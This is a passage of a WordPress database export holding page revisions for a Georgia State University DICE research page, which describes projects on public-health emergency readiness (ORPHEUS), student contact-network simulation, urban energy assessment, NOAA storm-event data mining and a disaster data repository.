class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:38:40','2023-09-29 14:38:40','',126,'https://gsudice.dataconn.net/?p=1484',0,'revision','',0),(1489,1,'2023-09-29 10:40:20','2023-09-29 14:40:20','','raychel-sanner-cswvKS59E90-unsplash','','inherit','open','closed','','raychel-sanner-cswvks59e90-unsplash','','','2023-09-29 10:40:20','2023-09-29 14:40:20','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/raychel-sanner-cswvKS59E90-unsplash.jpg',0,'attachment','image/jpeg',0),(1490,1,'2023-09-29 10:40:31','2023-09-29 14:40:31','https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg','raychel-sanner-cswvKS59E90-unsplash','','inherit','open','closed','','raychel-sanner-cswvks59e90-unsplash-2','','','2023-09-29 10:40:31','2023-09-29 14:40:31','',0,'https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-raychel-sanner-cswvKS59E90-unsplash-scaled-1.jpg',0,'attachment','image/jpeg',0),(1492,1,'2023-09-29 10:40:35','2023-09-29 14:40:35','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:40:35','2023-09-29 14:40:35','',438,'https://gsudice.dataconn.net/?p=1492',0,'revision','',0),(1493,1,'2023-09-29 10:40:35','2023-09-29 14:40:35','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate 